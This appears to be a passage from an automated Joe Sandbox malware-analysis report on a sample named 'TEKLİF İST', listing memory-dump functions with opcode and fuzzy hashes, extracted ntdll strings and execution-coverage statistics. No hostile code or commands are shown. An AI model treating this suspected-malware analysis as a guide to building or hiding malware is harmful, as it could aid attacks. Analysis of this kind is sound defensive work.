                                                                                                              • Opcode Fuzzy Hash: 0c0d6db14065e52c755447fe5641aa6ac24cc3b13c7fb8134cdd3bf9739beb0f
                                                                                                              • Instruction Fuzzy Hash: CA90023220140803D60471585508707000597D1201F55D461A0428559DD75A89526225
                                                                                                              Function 01B82CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9fc8d6b1e4e04e2276385bc8f57f1b82283b79db2c1046854568a6ce1026e147
                                                                                                              • Instruction ID: b43b46b2030e8048cbfc6a1b258925677d16c14d892337b2439ad5935eb7b945
                                                                                                              • Opcode Fuzzy Hash: 9fc8d6b1e4e04e2276385bc8f57f1b82283b79db2c1046854568a6ce1026e147
                                                                                                              • Instruction Fuzzy Hash: B690022260540802D64471585418706001597D1201F55D061A0028555DC75D8B5667A5
                                                                                                              Function 01B82C60 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 93b052ea574995bab3b65bb38f035ae786edcb288de666afed7e7da2184af93f
                                                                                                              • Instruction ID: c70b0875f9061ac3c0ef1590c595868545d0d3ab5bdf004908c4d7c79b892760
                                                                                                              • Opcode Fuzzy Hash: 93b052ea574995bab3b65bb38f035ae786edcb288de666afed7e7da2184af93f
                                                                                                              • Instruction Fuzzy Hash: E090023220140C42D60471584404B46000597E1301F55C066A0128655DC719C9527625
                                                                                                              Function 01B82FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb809729cab9902293dcd684eaf025f9b2228a45020d98a5e5ceb25e610de742
                                                                                                              • Instruction ID: 73f7c2fe423faedcb2089dcdfd1e0c7ae573c875183ba8899ac992939ed6cd7f
                                                                                                              • Opcode Fuzzy Hash: bb809729cab9902293dcd684eaf025f9b2228a45020d98a5e5ceb25e610de742
                                                                                                              • Instruction Fuzzy Hash: 6A90023220180802D60471584808747000597D1302F55C061A5168556EC769C9926635
                                                                                                              Function 01B82F60 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8bf4d50e2dea6ddea99e27f0f2badbe5ca2607538c06c354ab925144c1b71707
                                                                                                              • Instruction ID: fdbfe55ddd655f5d18f915c1aee896d62e2629b55359c27f8d7ef98d96f50de6
                                                                                                              • Opcode Fuzzy Hash: 8bf4d50e2dea6ddea99e27f0f2badbe5ca2607538c06c354ab925144c1b71707
                                                                                                              • Instruction Fuzzy Hash: C590026221140442D60871584404706004597E2201F55C062A2158555CC62D8D625229
                                                                                                              Function 01B82EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eef8e39ca94e98e2651d75c58e2226f1ee9a5528a376bf46fa80846997e67c50
                                                                                                              • Instruction ID: 5e36b44979672f652aae7e04cddbdc7d2c986114167944aa7d32b0643ff9463f
                                                                                                              • Opcode Fuzzy Hash: eef8e39ca94e98e2651d75c58e2226f1ee9a5528a376bf46fa80846997e67c50
                                                                                                              • Instruction Fuzzy Hash: 8990026220180803D64475584804607000597D1302F55C061A2068556ECB2D8D526239
                                                                                                              Function 01B82E30 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 49bcac29c32f48e0f81eb941d6cd3e38b335708628e07b39b0d27258a5a83524
                                                                                                              • Instruction ID: 826e1e8a09850c8080c0470245e1690a3a1ad8d16ca9dce2786d7f329de21c75
                                                                                                              • Opcode Fuzzy Hash: 49bcac29c32f48e0f81eb941d6cd3e38b335708628e07b39b0d27258a5a83524
                                                                                                              • Instruction Fuzzy Hash: B490022230140802D606715844146060009D7D2345F95C062E1428556DC7298A53A236
                                                                                                              Function 01B83090 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9439bcd198ccbcce0ba64a212afc966fd63a3e56db4884cc0ca105e7ccca72af
                                                                                                              • Instruction ID: 45af8a84fd7accb87c3feb268d79b1d418eead679fd2f496f9ef2b01568652ac
                                                                                                              • Opcode Fuzzy Hash: 9439bcd198ccbcce0ba64a212afc966fd63a3e56db4884cc0ca105e7ccca72af
                                                                                                              • Instruction Fuzzy Hash: 2D90022224140C02D644715884147070006D7D1601F55C061A0028555DC71A8A6667B5
                                                                                                              Function 01B83010 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 06693689eb249ab6eda7929caffd1ff78078fe8df89ca9d5aff1262c7babf508
                                                                                                              • Instruction ID: 0007cec48445b30afe833436a371d83da2bbd8fda9ab22c98702d9ab3c0b238e
                                                                                                              • Opcode Fuzzy Hash: 06693689eb249ab6eda7929caffd1ff78078fe8df89ca9d5aff1262c7babf508
                                                                                                              • Instruction Fuzzy Hash: D590022220184842D64472584804B0F410597E2202F95C069A415A555CCA1989565725
                                                                                                              Function 01B835C0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c46daf21a2e93ed8c440edff6cab66d579a105b8f38e7494c0a3d1f07b9a700d
                                                                                                              • Instruction ID: 4ef95940551b98f1d88b2abaf3250580e8d063c8b85b4d1bd536160be9219ec3
                                                                                                              • Opcode Fuzzy Hash: c46daf21a2e93ed8c440edff6cab66d579a105b8f38e7494c0a3d1f07b9a700d
                                                                                                              • Instruction Fuzzy Hash: 9090023260550802D60471584514706100597D1201F65C461A0428569DC7998A5266A6
                                                                                                              Function 01B839B0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 833993e661f2bac4be29e464370a6790d31996b85d55d6f7190336b83deeb5da
                                                                                                              • Instruction ID: 6ce5f17b68cdc82df8b690cc821035960fa4197a538b848b62d70c82ed572fbe
                                                                                                              • Opcode Fuzzy Hash: 833993e661f2bac4be29e464370a6790d31996b85d55d6f7190336b83deeb5da
                                                                                                              • Instruction Fuzzy Hash: 7190022224545502D654715C44046164005B7E1201F55C071A0818595DC65989566325
                                                                                                              Function 01B83D10 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cf32750b95c5911a051b9b8e536b344d9d49fc358d164e4fee6f6032efa7131
                                                                                                              • Instruction ID: 2c5d138eac5623910b2ec563d9bbd2cbb7c6182fbcd3fced6167bb39e9812406
                                                                                                              • Opcode Fuzzy Hash: 0cf32750b95c5911a051b9b8e536b344d9d49fc358d164e4fee6f6032efa7131
                                                                                                              • Instruction Fuzzy Hash: 7C900232202405429A4472585804A4E410597E2302B95D465A0019555CCA1889625325
                                                                                                              Function 01B83D70 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6d31d914a369e42da85cf2f62665b4f7d732a8d359aa430cb9aa241ffc0cc8e4
                                                                                                              • Instruction ID: de8a256779bb6d8f6b83b968dc80cb310dd5ecf508d8b95dac0926673ed6ce43
                                                                                                              • Opcode Fuzzy Hash: 6d31d914a369e42da85cf2f62665b4f7d732a8d359aa430cb9aa241ffc0cc8e4
                                                                                                              • Instruction Fuzzy Hash: 3F90023620140802DA1471585804646004697D1301F55D461A0428559DC75889A2A225
                                                                                                              Function 01B82C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction ID: 03b9ec35113c306a3628021ff29d0f05620e39872fcb3a7b7e1d413cd37f8f6e
                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Function 01B82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: a314f0cc4c168c3f61e4900b89a855e420a5c8ae62db61bfa0e9ba500e3609c2
                                                                                                              • Instruction ID: 7f2cfbbe9c4cfcd334679d8be28fa8b718fcfbccc9abbbaea76450f2b59e220f
                                                                                                              • Opcode Fuzzy Hash: a314f0cc4c168c3f61e4900b89a855e420a5c8ae62db61bfa0e9ba500e3609c2
                                                                                                              • Instruction Fuzzy Hash: 3451E4B6A00116BECF29EBACC89097EFBB8FB4864075082E9E465D3641D374DE50C7A0
                                                                                                              Function 01BF2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 4bb4bbdb37ffa64fed50f9770f3975a731cd445e6828ddbed882895446c1d254
                                                                                                              • Instruction ID: 7bc85668029923e00afa994d9bc2f2359da34576c1c36f6d4c88a59b5a47ac2c
                                                                                                              • Opcode Fuzzy Hash: 4bb4bbdb37ffa64fed50f9770f3975a731cd445e6828ddbed882895446c1d254
                                                                                                              • Instruction Fuzzy Hash: 90510675A00646AFDF38DF9CC89097FBBF8EB44200B0484EDE696C7641E7B4DA488760
                                                                                                              Function 01B77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Execute=1, xrefs: 01BB4713
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01BB4655
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01BB4725
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01BB4787
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01BB4742
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01BB46FC
                                                                                                              • ExecuteOptions, xrefs: 01BB46A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 895a73aa050b52527699b81f36b803f425c3a96b2ef5fe235e70f0b10943a5c6
                                                                                                              • Instruction ID: 354f0d2da5e1830998122ec10d7638b43fe3a92ac938afd1e13a5476896bf0ce
                                                                                                              • Opcode Fuzzy Hash: 895a73aa050b52527699b81f36b803f425c3a96b2ef5fe235e70f0b10943a5c6
                                                                                                              • Instruction Fuzzy Hash: 47513B316002197AEF19AAA9DC8DFF977A8EF14700F0401EDE515AB191EF71EA45CF50
                                                                                                              Function 01B8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction ID: f13c2a360676fb62616e8f6deda22bd94cb9b665c706de2e7157aa8955e5aca8
                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction Fuzzy Hash: A581D134E152499EEF2DBE7CCA507FEBBB1EF45B20F184299E861A7291C7349840CB51
                                                                                                              Function 01BF20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 50274264ffb5fa1a75852763b0421695c20d4a6a15cf8b2b9180efbb28ae5486
                                                                                                              • Instruction ID: e1a1be21834558b33817147c2cf6a44192e690665a669296bf843178a7b6fcd2
                                                                                                              • Opcode Fuzzy Hash: 50274264ffb5fa1a75852763b0421695c20d4a6a15cf8b2b9180efbb28ae5486
                                                                                                              • Instruction Fuzzy Hash: EA21657AA00119ABDB15DF7ACC41AEFBBF8EF54640F4401AAEA05D3200E730DA158BA5
                                                                                                              Function 01B6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01BB02E7
                                                                                                              • RTL: Re-Waiting, xrefs: 01BB031E
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01BB02BD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 78fe2b0b35d1fe76146a80a0ef783627b13d8005bce56185b7447d7d1394ffeb
                                                                                                              • Instruction ID: af47c76656ab40be0352719cc1d164814d2d702ce1231ce5909cb01f835cac00
                                                                                                              • Opcode Fuzzy Hash: 78fe2b0b35d1fe76146a80a0ef783627b13d8005bce56185b7447d7d1394ffeb
                                                                                                              • Instruction Fuzzy Hash: 55E1FE306047019FDB29DF28D894B7ABBE4FB98714F140AADF5A58B2E1D778D844CB42
                                                                                                              Function 01B7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01BB7B7F
                                                                                                              • RTL: Re-Waiting, xrefs: 01BB7BAC
                                                                                                              • RTL: Resource at %p, xrefs: 01BB7B8E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 73654605b43332e817d668c40e174959c5d927df43459d8f0051333666bee44a
                                                                                                              • Instruction ID: fd8d281a20977fcece6f9882fa4000c3472d36540ecb224a23cd4fe8e24efe04
                                                                                                              • Opcode Fuzzy Hash: 73654605b43332e817d668c40e174959c5d927df43459d8f0051333666bee44a
                                                                                                              • Instruction Fuzzy Hash: D54127313007028FDB28DE29C950B66B7E5EF85B10F100A9DF96ADB680DB71E405CF91
                                                                                                              Function 01B7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BB728C
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 01BB72C1
                                                                                                              • RTL: Resource at %p, xrefs: 01BB72A3
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01BB7294
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: 9f34c5b90e3372452bfde1d5b6fcbce9038a113286431a40ad6482aec45e426e
                                                                                                              • Instruction ID: 9ff911925a0c70492e043a7111afc0b557231b8a3aca268a97df50c4dc299ec5
                                                                                                              • Opcode Fuzzy Hash: 9f34c5b90e3372452bfde1d5b6fcbce9038a113286431a40ad6482aec45e426e
                                                                                                              • Instruction Fuzzy Hash: 6B411031600206AFCB29DE29CC81BA6B7A1FF95710F100698F965EB680DB71E802CBD0
                                                                                                              Function 01BF2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: ef1bd5125fdedfa1cf78399b0df1a7214c10fbdea4d0a5e8f321c697278a0dce
                                                                                                              • Instruction ID: af8c1135b4760292baf90169ae142fa304f2e5660f47550ae4906d09d891658c
                                                                                                              • Opcode Fuzzy Hash: ef1bd5125fdedfa1cf78399b0df1a7214c10fbdea4d0a5e8f321c697278a0dce
                                                                                                              • Instruction Fuzzy Hash: 4D318672A006199FDB24DE2DCC80BEE77F8EB54610F4445D9E949E3200EB30DA498BA0
                                                                                                              Function 01B87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction ID: 62725d8f6dcd232e4c9251144ce5df71d49c11e225c4e21240e80fd628bca2a2
                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction Fuzzy Hash: 4491B471E002569BDF28FF6DC8806BEBBA5EF44B28F74469AE955A72C0DF308941C750
                                                                                                              Function 01B49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: eb38ce2fb2cf2e5fa47ee56f5436b9dec776f7575003765a2f8b435499215b1b
                                                                                                              • Instruction ID: 7e2696e394b8418a19fb61de708bd5e2978704cb0b7a3a313995a476af32bb1a
                                                                                                              • Opcode Fuzzy Hash: eb38ce2fb2cf2e5fa47ee56f5436b9dec776f7575003765a2f8b435499215b1b
                                                                                                              • Instruction Fuzzy Hash: E2811C71D012699BDB39DF54CC44BEEB7B8AB08754F0041EAAA1AB7240D7709E84DFA0
                                                                                                              Function 01BCCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 01BCCFBD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallFilterFunc@8
                                                                                                              • String ID: @$@4Qw@4Qw
                                                                                                              • API String ID: 4062629308-2383119779
                                                                                                              • Opcode ID: 7bf237d63894e1c72b5ad1957c6e758dfae9b24799dfeb0ce27840300ce5737d
                                                                                                              • Instruction ID: d3e7e2be3a05957abc829cfb1f439477ef0f2b5ee75f71f2a87f47d3254a8606
                                                                                                              • Opcode Fuzzy Hash: 7bf237d63894e1c72b5ad1957c6e758dfae9b24799dfeb0ce27840300ce5737d
                                                                                                              • Instruction Fuzzy Hash: 4A41BF75900255DFCB29EFA9C840AADBBB8FF59B40F0041BEE905DB254E734C901CBA4

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.3%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:4.7%
                                                                                                              Total number of Nodes:444
                                                                                                              Total number of Limit Nodes:16
